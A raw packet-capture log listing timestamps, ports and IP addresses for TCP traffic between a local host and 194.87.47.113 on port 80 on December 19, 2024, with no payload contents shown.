Dec 19, 2024 08:47:29.652345896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.652395010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.652790070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.653117895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.653183937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.653394938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.654045105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.654130936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.654654026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.654921055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.654927969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.655077934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.655553102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.655635118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.655904055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.656321049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.656389952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.656601906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.657094002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.657159090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.657299042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.657915115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.657970905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.658093929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.658648968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.658745050 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.799611092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.800033092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.800040960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.800105095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.800415039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.800534964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.800822020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.800828934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.800905943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.801464081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.811927080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.811986923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.812124014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.812536955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.812544107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.812688112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.813203096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.813260078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.813878059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.814043999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.814145088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.814279079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.814672947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.814822912 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.815010071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.815016985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.815067053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.815711975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.816526890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.816534996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.816901922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.816910028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.816967010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.817327976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.817760944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.817857027 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.818099976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.818304062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.818383932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.818886042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.819061041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.819209099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.820081949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.820245981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.820322037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.820593119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.820980072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.821067095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.821293116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.821651936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.821804047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.822043896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.822345018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.822438002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.822834015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.823031902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.823096037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.823916912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.824091911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.824132919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.824749947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.825073004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.825150967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.825601101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.826123953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.826208115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.826240063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.826402903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.826493979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.826807976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.826997995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.827049017 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.827649117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.827917099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.827965021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.828414917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.828634977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.828675032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.829191923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.829370022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.829416037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.829957008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.830135107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.830203056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.830749989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.831784010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.831790924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.831856966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.831969976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.832089901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.832366943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.832376003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.832446098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.833144903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.833463907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.833719969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.833923101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.834131956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.834223032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.834764004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.834772110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.834821939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.835537910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.835712910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.835903883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.836297989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.836514950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.836571932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.837106943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.837393999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.837440968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.837905884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.838121891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.838208914 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.838675976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.838934898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.838993073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.839457989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.840050936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.840104103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.840308905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.840594053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.840666056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.841046095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.841339111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.841443062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.841850996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.842263937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.842350960 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.842639923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.842973948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.843118906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.843441010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.843763113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.843844891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.844212055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.844598055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.844698906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.844985008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.845206022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.845390081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.845807076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.845963955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.846074104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.846651077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.846888065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.846961021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.847395897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.847609997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.847747087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.848242044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.848442078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.848501921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.848994017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.849520922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.849601030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.849721909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.850102901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.850199938 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.850526094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.850759983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.850915909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.991790056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.991976976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.992079020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.992312908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.992321014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.992379904 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.992993116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.993350029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:29.993418932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:29.993771076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.003942966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.004021883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.004353046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.004365921 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.004409075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.004846096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.005227089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.005290031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.005645990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.005893946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.006052971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.006144047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.006468058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.006525040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.006942987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.007359028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.007417917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.007786989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.007798910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.007850885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.008527040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.008783102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.009047031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.009424925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.009437084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.009478092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.010237932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.010795116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.010848045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.010996103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.011017084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.011091948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.012233973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.012458086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.012517929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.012801886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.012814045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.012886047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.013482094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.013839006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.013881922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.014204979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.014561892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.014632940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.014977932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.015368938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.015425920 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.015758038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.016580105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.016592979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.016639948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.016906977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.016962051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.017358065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.017370939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.017417908 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.018132925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.018929958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.018944979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.019027948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.019260883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.019329071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.019717932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.020545959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.020556927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.020623922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.020886898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.020927906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.021390915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.021409035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.021549940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.022092104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.022887945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.022901058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.022927999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.023286104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.023365974 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.023628950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.023950100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.024030924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.024434090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.024785995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.024847984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.025239944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.025439024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.025492907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.026038885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.026278973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.026339054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.027120113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.027137041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.027188063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.027688026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.027923107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.027967930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.028409958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.028806925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.028913021 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.029254913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.029401064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.029459953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.030040026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.030052900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.030106068 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.030803919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.031601906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.031614065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.031656981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.032085896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.032238007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.032376051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.032644987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.032681942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.033176899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.033365965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.033417940 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.033967018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.034605980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.034651041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.034790993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.034804106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.034881115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.035576105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.036371946 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.036384106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.036426067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.036715984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.036802053 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.037234068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.037246943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.037295103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.037966967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.038232088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.038358927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.038681030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.038925886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.038996935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.039630890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.039752007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.039789915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.040383101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.040396929 CET	80	49707	194.87.47.113	192.168.2.7
